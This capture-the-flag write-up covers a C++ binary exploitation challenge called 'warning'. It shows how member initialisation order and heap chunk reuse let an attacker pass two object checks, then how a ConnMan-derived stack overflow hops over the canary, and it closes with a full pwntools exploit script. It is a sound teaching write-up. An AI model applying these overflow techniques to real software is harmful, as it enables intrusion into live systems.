This challenge was a bit about C++ behavior, and a real life vulnerability! Here’s the description:
I use whatever compiler gives me the least warnings 🤷♂️. Wait, you’re saying everyone just ignores warnings anyways? Dope. Let’s fly
We are given a docker.tar.bz2
file which could be imported with the following command.
cat docker.tar.bz2 | docker load
After loading this, and running the corresponding container we can see the source code given in static/main.cpp
and the binary loaded in challenge/warning
. Taking a quick look at the main function in the provided source we see the following:
int main(){
// Shamelessly stolen from pedant
int timeout = 120;
char *timeout_str = getenv("TIMEOUT");
if (timeout_str) {
timeout = atoi(timeout_str);
}
signal(SIGALRM, timeout_func);
alarm(timeout+2);
signal(SIGPIPE, SIG_IGN);
std::cout << "> " << std::flush;
// I really hate C++
{
std::string s;
std::cin >> s;
}
Warning* w0 = new Warning();
if(!w0->check(1)){
goodbye();
}
Warning* w1 = new Warning();
flushcin();
w0->get_str();
if(!w1->check(2)){
goodbye();
}
// I'll just give you the leak. Screw it
printf("get_flag: %p\n", get_flag);
w1->get_input();
return 0;
}
Mostly straight forward, except for the interesting sub-scoped block:
// I really hate C++
{
std::string s;
std::cin >> s;
}
This is where the first bug comes from. But first, what is the check
function?
bool Warning::check(uint8_t lvl){
switch(lvl){
case 1:
std::cout << "Case 1: " << 0x1000 << std::endl;
if((a+b-c) == 0x1000){
std::cout << "Nice." << std::endl;
return true;
}
return false;
case 2:
std::cout << "Case 2: " << -256 << std::endl;
if(a == -256){
std::cout << "Nicee." << std::endl;
return true;
}
return false;
default:
return false;
}
return false;
}
This function is performing arithmetic on various members of the Warning::
class. What is this class defined as?
class Warning{
public:
Warning( );
~Warning();
void get_str();
void get_input();
void jump_around(char *start, char *end, char *uncompressed, size_t uncomp_len);
void output();
bool check(uint8_t lvl);
protected:
int a;
int b;
int c;
char buf[0x10C];
};
And its constructor…
// I hate c++
Warning::Warning():
c( 10 ),
b( c+20 ),
a( b-5 ){
}
# Fun with C++
When we encounter the string object, and leave the { ... }
scope, the string object will call its destructor. Unfortunately for the program, this space, if a large enough string object was given, will be used again when the call to Warning* w0 = new Warning();
is made. None of the functions are overflown, but the private members are. This allows us to satisfy the condition if((a+b-c) == 0x1000)
in Warning::check
. Based on the code, it looks like Warning::
’s constructor will initialize c
first, and populate b
and then a
accordingly. However, looking at the disassembely this is shown to not be the case.
Dump of assembler code for function _ZN7WarningC2Ev:
0x0000555555556994 <+0>: endbr64
0x0000555555556998 <+4>: push rbp
0x0000555555556999 <+5>: mov rbp,rsp
0x000055555555699c <+8>: mov QWORD PTR [rbp-0x8],rdi
0x00005555555569a0 <+12>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569a4 <+16>: mov eax,DWORD PTR [rax+0x4]
0x00005555555569a7 <+19>: lea edx,[rax-0x5] ; A is first initilized with B - 0x5
0x00005555555569aa <+22>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569ae <+26>: mov DWORD PTR [rax],edx
0x00005555555569b0 <+28>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569b4 <+32>: mov eax,DWORD PTR [rax+0x8]
0x00005555555569b7 <+35>: lea edx,[rax+0x14] ; B is then initialized with C + 0x14
0x00005555555569ba <+38>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569be <+42>: mov DWORD PTR [rax+0x4],edx
0x00005555555569c1 <+45>: mov rax,QWORD PTR [rbp-0x8]
0x00005555555569c5 <+49>: mov DWORD PTR [rax+0x8],0xa ; C is then initilized with 0xa
0x00005555555569cc <+56>: nop
0x00005555555569cd <+57>: pop rbp
0x00005555555569ce <+58>: ret
# Variable initialization
So why is A being initialized first, followed by B, then C? Well, this has to do with the ordering of the variables in the class declaration when using member list initialization. For example, consider the following two classes. In the below example, the ordering is a,b,c
.
class Warning {
public:
Warning( );
~Warning();
private:
int a;
int b;
int c;
char buf[0x10C];
};
Which will result in the following constructor.
Dump of assembler code for function _ZN8Warning3C2Ev:
0x000000000040131c <+0>: push rbp
0x000000000040131d <+1>: mov rbp,rsp
0x0000000000401320 <+4>: mov QWORD PTR [rbp-0x8],rdi
0x0000000000401324 <+8>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401328 <+12>: mov eax,DWORD PTR [rax+0x4]
0x000000000040132b <+15>: lea edx,[rax-0xa] ; A is first initilized with B - 0xa
0x000000000040132e <+18>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401332 <+22>: mov DWORD PTR [rax],edx
0x0000000000401334 <+24>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401338 <+28>: mov eax,DWORD PTR [rax+0x8]
0x000000000040133b <+31>: lea edx,[rax+0x5] ; B is then initilized with C + 0x5
0x000000000040133e <+34>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401342 <+38>: mov DWORD PTR [rax+0x4],edx
0x0000000000401345 <+41>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401349 <+45>: mov DWORD PTR [rax+0x8],0xa; C is the initilized with 0xa
0x0000000000401350 <+52>: nop
0x0000000000401351 <+53>: pop rbp
0x0000000000401352 <+54>: ret
And in the below example the ordering is c,b,a
.
class Warning {
public:
Warning( );
~Warning();
private:
int c;
int b;
int a;
char buf[0x10C];
};
Produces the following constructor.
Dump of assembler code for function _ZN8Warning4C2Ev:
0x00000000004013e0 <+0>: push rbp
0x00000000004013e1 <+1>: mov rbp,rsp
0x00000000004013e4 <+4>: mov QWORD PTR [rbp-0x8],rdi
0x00000000004013e8 <+8>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004013ec <+12>: mov DWORD PTR [rax],0xa ; C is first initilized with 0xa
0x00000000004013f2 <+18>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004013f6 <+22>: mov eax,DWORD PTR [rax]
0x00000000004013f8 <+24>: lea edx,[rax+0x5] ; B is then initilized with C + 0x5
0x00000000004013fb <+27>: mov rax,QWORD PTR [rbp-0x8]
0x00000000004013ff <+31>: mov DWORD PTR [rax+0x4],edx
0x0000000000401402 <+34>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401406 <+38>: mov eax,DWORD PTR [rax+0x4]
0x0000000000401409 <+41>: lea edx,[rax-0xa] ; A is then initilized with B - 0xa
0x000000000040140c <+44>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000401410 <+48>: mov DWORD PTR [rax+0x8],edx
0x0000000000401413 <+51>: nop
0x0000000000401414 <+52>: pop rbp
0x0000000000401415 <+53>: ret
Even with the same constructors, these will have their variables initialized in the complete opposite order! Neat.
If we can somehow force the allocation to happen on a location we have used, this will result in us being able to control the a and b members of the Warning::
class.
# Messing with the constructor
We can clearly see what we want to target now. We can send the following data for our new Warning::
object to use.
_satisfy_w0_check = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * 0x400
But why is this extra padding needed?
# Differences between TCACHEBINS and SMALLBINS
When freeing on the heap, if the chunk size is under 0x410
, then it will be released into a tcache bin. This is not what we want here, as when this happens, some data at the start is overwritten. This can be seen in malloc/malloc.c
source code:
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
Because this is not what we want, we need to have some allocation over 0x410
bytes. This is why we pad the initial _satisfy_w0_check
with a size of 0x400
. This causes our next free to place our chunk into a smallbin, and the next call to malloc will return this chunk, without overwriting any of our data.
After satisfying the w0->check()
, we have yet another check to pass, in the new Warning::
object’s call to check
. This time we are needing to satisfy that a==-256
. With what we know about this objects constructor, this should be rather easy to pass.
We pad our initial value with an extra 280 bytes, which is the exact size of the Warning::
object plus heap metadata plus the size of an int, and simply append four \xff
’s to the end. The X
’s are simply more padding to ensure ending up in the smallbin. We are not overwriting w1->a
initially, but w1->b
and taking advantage of the constructor to cause w1->a
to be initialized to w1->b
minus 5.
_satisfy_both_checks = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + (b'A' * 280) + b'\xff' * 4
_satisfy_both_checks += b'X' * 0x300
After sending this data, here is what the top of the w1
object looks like.
Chunk(addr=0x556742cc1bc0, size=0x120, flags=PREV_INUSE)
[0x0000556742cc1bc0 fa ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58 ....lXXX....XXXX]
The w0
object at this point is:
Chunk(addr=0x556742cc1aa0, size=0x120, flags=PREV_INUSE)
[0x0000556742cc1aa0 f6 07 00 00 14 08 00 00 0a 00 00 00 41 41 41 41 ............AAAA]
Finally, we make a call to w0->get_str()
of exactly 0x115
will fill the buffer at 0x0000556742cc1aab
. Doing some quick math, we can see that 0x0000556742cc1aab+0x115
is exactly the start of our w1
object. Reading the fgets
man page…
fgets() reads in at most one less than size characters from stream and stores them into the buffer pointed to by s. Reading stops after an EOF or a newline. If a newline is read, it is stored into the buffer. A terminating null byte (’\0’) is stored after the last character in the buffer.
We can write a nullbyte into the w1->a
variable. Our final w1
object after the read will look like:
Chunk(addr=0x556742cc1bc0,, size=0x4242424242424240, flags=! PREV_INUSE|IS_MMAPPED)
[0x556742cc1bc0 00 ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58 ....lXXX....XXXX]
And we pass through all the checks! After which, the author was nice enough to give us a infoleak for a nice little ret2win
.
# Getting jumpy
Next, w1->get_input();
is called. This function follows
void Warning::get_input(){
struct {
char buf1[1025];
char buf2[257];
} input_bufs = {0};
flushcin();
std::cout << "> ";
if(!fgets(input_bufs.buf1, sizeof(input_bufs.buf1), stdin)){
exit(-1);
}
// Do you like TBONE steak?
jump_around(input_bufs.buf1,
input_bufs.buf1 + 1024,
input_bufs.buf2,
sizeof(input_bufs.buf2));
printf("Jump! Jump! Jump! Jump!\n");
}
Not much going on here, on to jump_around
// Pack it up, pack it in, let me begin
void Warning::jump_around(char *start,
char *end,
char *uncompressed,
size_t uncomp_len){
// wow this whole function seems so contrived
// it makes literally no sense
char *uptr = uncompressed;
char *bptr = start;
// The bug in this function would never b a bug in real life
while(bptr < end && uptr < (uncompressed + uncomp_len)){
size_t ulen;
size_t pos = 0;
char name[63] = {0};
#if !USERINPUT
if (!convert_label(start, end, ptr, name, NS_MAXLABEL,
&pos, &comp_pos))
goto out;
/*
* Copy the uncompressed resource record, type, class and \0 to
* tmp buffer.
*/
#else
// Give me your con man name
std::cout << "> ";
fgets(name, sizeof(name), stdin);
ulen = strnlen(name, sizeof(name));
#endif
// Error checking, thats good
if((uptr - uncompressed) > uncomp_len){
return;
}
strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
// C++ but pointer math? :thinking_face:
uptr += ulen;
*uptr++ = '\0';
bptr += pos;
memcpy(uptr, bptr, 10);
bptr += 10;
uptr += 10;
}
return;
}
Alright, there’s a lot more going on here. The bug arises from the fact there is no out of bounds length checking on the memcpy, and the value of ulen
can cause uptr
to be out of bounds in some situations. Because of this, we can overflow the buffer. Usually with stack canaries this has limited impact, however in this case we can carefully craft our input to “jump” over the canary. Note the uptr += ulen;
line that causes this.
Sending the first two buffers of max length, and a final buffer with a size of 0x33
will let us do this. When we process the strnlen()
of our final buffer, we only strncpy
a total of uncomp_len - (uptr - uncompressed)
, which is where the issue comes from. We still add the strnlen
to our buffer, and this lets us “jump” over the stack cookie. We can send an input of 30 padding bytes, and our desired return address. With this, we redirect code execution where ever we want. Here is what this looks like in code.
_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get)) ; PADDING before overwriting RIP
print(p.recv(timeout=1))
buf = b'\x01' *0x3d + b'\x02' ; Fill up the buffer
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00' ; This wont finish a full copy, but the length is important
p.sendline(buf)
# Putting it all together
With all that in mind, here is what the final exploit looks like.
from pwn import *
from binascii import hexlify, unhexlify
context.terminal = ['tmux', 'splitw', '-h']
_ticket = "TICKET"
g = cyclic_gen()
_remote = 0
if _remote:
p = remote("warning.quals2023-kah5Aiv9.satellitesabove.me",5300)
p.sendline(_ticket.encode())
else:
p = process("./warning")
print(p.recvuntil(b'> '))
p.sendline(b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * (280) + b'\xff\xff\xff\xff' +b'X' * 0x300)
print(p.recvline())
print(p.recvline())
print(p.recvuntil(b'> '))
print("sending first payload")
p.sendline(b"B"*0x114)
p.recvline()
p.recvline()
leak = p.recvline()
print(leak)
_offset = int(leak.split(b' ')[1][:-1],16)
print("Got leaked funciton: " + hex(_offset))
_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get))
print(p.recv(timeout=1))
buf = b'\x01' *0x3d + b'\x02'
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'
p.sendline(buf)
print(p.recvuntil(b'> '))
print(p.recvline())
print(p.recvline())
Run it, and get the flag.
# Misc
The
jump_around
function was an actual vulnerable function in theConnMan(v1.37)
network manager that was used by the Tesla Model 3. The bug was leveraged by the team at comsecuris to exploit the Model 3 at the 2020 Pwn2Own competition! Super cool stuff.
The version of glibc that was used in this challenge is
2.35